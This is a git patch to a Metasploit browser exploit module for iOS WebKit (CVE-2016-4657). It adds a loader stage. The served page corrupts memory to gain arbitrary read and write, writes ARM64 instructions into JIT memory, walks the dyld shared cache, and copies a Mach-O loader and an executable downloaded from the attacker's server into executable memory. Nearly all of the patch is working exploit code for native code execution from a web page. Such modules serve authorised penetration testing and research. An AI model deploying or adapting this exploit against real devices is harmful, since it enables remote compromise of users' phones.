From d465226d89d6c1d1c19fd0b6dea5705ef876b2bd Mon Sep 17 00:00:00 2001
From: Tim W <timrlw@gmail.com>
Date: Sat, 24 Mar 2018 11:35:03 +0800
Subject: [PATCH] add loader

---
 .../apple_ios/browser/webkit_trident.rb       | 172 ++++++++++++++----
 1 file changed, 137 insertions(+), 35 deletions(-)

diff --git a/modules/exploits/apple_ios/browser/webkit_trident.rb b/modules/exploits/apple_ios/browser/webkit_trident.rb
index b9dce14e3e..5a32b42690 100644
--- a/modules/exploits/apple_ios/browser/webkit_trident.rb
+++ b/modules/exploits/apple_ios/browser/webkit_trident.rb
@@ -41,27 +41,57 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     print_status("Request from #{request['User-Agent']}")
-    array_payload = Rex::Text.to_num(payload.raw)
+    if request.uri =~ /\/loader$/
+      print_good("Target is vulnerable.")
+      local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4657", "loader" )
+      loader_data = File.read(local_file, {:mode => 'rb'})
+      send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})
+      return
+    elsif request.uri =~ /\/exec$/
+      local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4657", "exec" )
+      loader_data = File.read(local_file, {:mode => 'rb'})
+      send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})
+      print_status("Sent exec")
+      return
+    end
+    #array_payload = Rex::Text.to_num(payload.raw)
     html = %Q^
 <html>
 <body>
 <script>
- var payload = new Uint8Array([#{array_payload}]);
- var payload32 = new Uint32Array(payload.buffer)
+ function load_binary_resource(url) {
+   var req = new XMLHttpRequest();
+   req.open('GET', url, false);
+   req.overrideMimeType('text\/plain; charset=x-user-defined');
+   req.send(null);
+   if (req.status != 200) {
+     document.write("fail downloading loader");
+   };
+   return req.responseText;
+ }
  var mem0 = 0;
  var mem1 = 0;
  var mem2 = 0;
+
  function read4(addr) {
   mem0[4] = addr;
   var ret = mem2[0];
   mem0[4] = mem1;
   return ret;
  }
+
  function write4(addr, val) {
   mem0[4] = addr;
   mem2[0] = val;
   mem0[4] = mem1;
  }
+ filestream = load_binary_resource("exec")
+ var shll = new Uint32Array(filestream.length / 4);
+ for (var i = 0; i < filestream.length;) {
+  var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i + 1) & 0xff) << 8) | ((filestream.charCodeAt(i + 2) & 0xff) << 16) | ((filestream.charCodeAt(i + 3) & 0xff) << 24);
+  shll[i / 4] = word;
+  i += 4;
+ }
  _dview = null;
  function u2d(low, hi) {
   if (!_dview) _dview = new DataView(new ArrayBuffer(16));
@@ -79,16 +109,12 @@ class MetasploitModule < Msf::Exploit::Remote
    pressure[i] = 0;
   }
  }
+
  function swag() {
   if (bufs[0]) return;
-  dgc();
-  dgc();
-  dgc();
-  dgc();
-  dgc();
-  dgc();
-  dgc();
-  dgc();
+  for (var i = 0; i < 4; i++) {
+    dgc();
+  }
   for (i = 0; i < bufs.length; i++) {
    bufs[i] = new Uint32Array(0x100 * 2)
    for (k = 0; k < bufs[i].length;) {
@@ -101,18 +127,67 @@ class MetasploitModule < Msf::Exploit::Remote
  for (var z = 0; z < 0x2000; z++) trycatch += "try{} catch(e){}; ";
  var fc = new Function(trycatch);
  var fcp = 0;
- var smsh = new Uint32Array(0x10);
+ var smsh = new Uint32Array(0x10)
+
  function smashed(stl) {
+  document.body.innerHTML = "";
   var jitf = (smsh[(0x10 + smsh[(0x10 + smsh[(fcp + 0x18) / 4]) / 4]) / 4]);
-  for(n=0; n<payload32.length; n++) {
-    write4(jitf + n*4, payload32[n]);
+  write4(jitf, 0xd28024d0);         //movz x16, 0x126
+  write4(jitf + 4, 0x58000060);     //ldr x0, 0x100007ee4
+  write4(jitf + 8, 0xd4001001);     //svc 80
+  write4(jitf + 12, 0xd65f03c0);    //ret
+  write4(jitf + 16, jitf + 0x20);
+  write4(jitf + 20, 1);
+  fc();
+  var dyncache = read4(jitf + 0x20);
+  var dyncachev = read4(jitf + 0x20);
+  var go = 1;
+  while (go) {
+   if (read4(dyncache) == 0xfeedfacf) {
+    for (i = 0; i < 0x1000 / 4; i++) {
+     if (read4(dyncache + i * 4) == 0xd && read4(dyncache + i * 4 + 1 * 4) == 0x40 && read4(dyncache + i * 4 + 2 * 4) == 0x18 && read4(dyncache + i * 4 + 11 * 4) == 0x61707369) // lulziest mach-o parser ever
+     {
+      go = 0;
+      break;
+     }
+    }
+   }
+   dyncache += 0x1000;
+  }
+  dyncache -= 0x1000;
+  var bss = [];
+  var bss_size = [];
+  for (i = 0; i < 0x1000 / 4; i++) {
+   if (read4(dyncache + i * 4) == 0x73625f5f && read4(dyncache + i * 4 + 4) == 0x73) {
+    bss.push(read4(dyncache + i * 4 + (0x20)) + dyncachev - 0x80000000);
+    bss_size.push(read4(dyncache + i * 4 + (0x28)));
+   }
+  }
+  var shc = jitf;
+  var filestream = load_binary_resource("loader")
+  for (var i = 0; i < filestream.length;) {
+   var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i + 1) & 0xff) << 8) | ((filestream.charCodeAt(i + 2) & 0xff) << 16) | ((filestream.charCodeAt(i + 3) & 0xff) << 24);
+   write4(shc, word);
+   shc += 4;
+   i += 4;
+  }
+  jitf &= ~0x3FFF;
+  jitf += 0x8000;
+  write4(shc, jitf);
+  write4(shc + 4, 1);
+  // copy macho
+  for (var i = 0; i < shll.length; i++) {
+   write4(jitf + i * 4, shll[i]);
+  }
+  for (var i = 0; i < bss.length; i++) {
+   for (k = bss_size[i] / 6; k < bss_size[i] / 4; k++) {
+    write4(bss[i] + k * 4, 0);
+   }
   }
   fc();
+  alert(2);
  }
- function go() {
-  dgc();
-  setTimeout(go_, 400);
- }
+
  function go_() {
   if (smsh.length != 0x10) {
    smashed();
@@ -131,18 +206,42 @@ class MetasploitModule < Msf::Exploit::Remote
    return 10;
   };
   var props = {
-   p0: { value: 0 },
-   p1: { value: 1 },
-   p2: { value: 2 },
-   p3: { value: 3 },
-   p4: { value: 4 },
-   p5: { value: 5 },
-   p6: { value: 6 },
-   p7: { value: 7 },
-   p8: { value: 8 },
-   length: { value: not_number },
-   stale: { value: arr },
-   after: { value: 666 }
+   p0: {
+    value: 0
+   },
+   p1: {
+    value: 1
+   },
+   p2: {
+    value: 2
+   },
+   p3: {
+    value: 3
+   },
+   p4: {
+    value: 4
+   },
+   p5: {
+    value: 5
+   },
+   p6: {
+    value: 6
+   },
+   p7: {
+    value: 7
+   },
+   p8: {
+    value: 8
+   },
+   length: {
+    value: not_number
+   },
+   stale: {
+    value: arr
+   },
+   after: {
+    value: 666
+   }
   };
   var target = [];
   var stale = 0;
@@ -150,14 +249,14 @@ class MetasploitModule < Msf::Exploit::Remote
   stale = target.stale;
   stale[0] += 0x101;
   stale[1] = {}
-  for (z = 0; z < 0x1000; z++) fc();
+  for (var z = 0; z < 0x1000; z++) fc();
   for (i = 0; i < bufs.length; i++) {
    for (k = 0; k < bufs[0].length; k++) {
     if (bufs[i][k] == 0x41414242) {
      stale[0] = fc;
      fcp = bufs[i][k];
      stale[0] = {
-      'a': u2d(105, 0x1172600),
+      'a': u2d(105, 0),
       'b': u2d(0, 0),
       'c': smsh,
       'd': u2d(0x100, 0)
@@ -179,14 +278,17 @@ class MetasploitModule < Msf::Exploit::Remote
     }
    }
   }
-  document.location.reload();
+  setTimeout(function() {
+    document.location.reload();
+  }, 2000);
  }
-setTimeout(go, 100);
+
+dgc();
+setTimeout(go_, 200);
 </script>
 </body>
 </html>
     ^
-    print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...")
     send_response(cli, html, {'Content-Type'=>'text/html'})
   end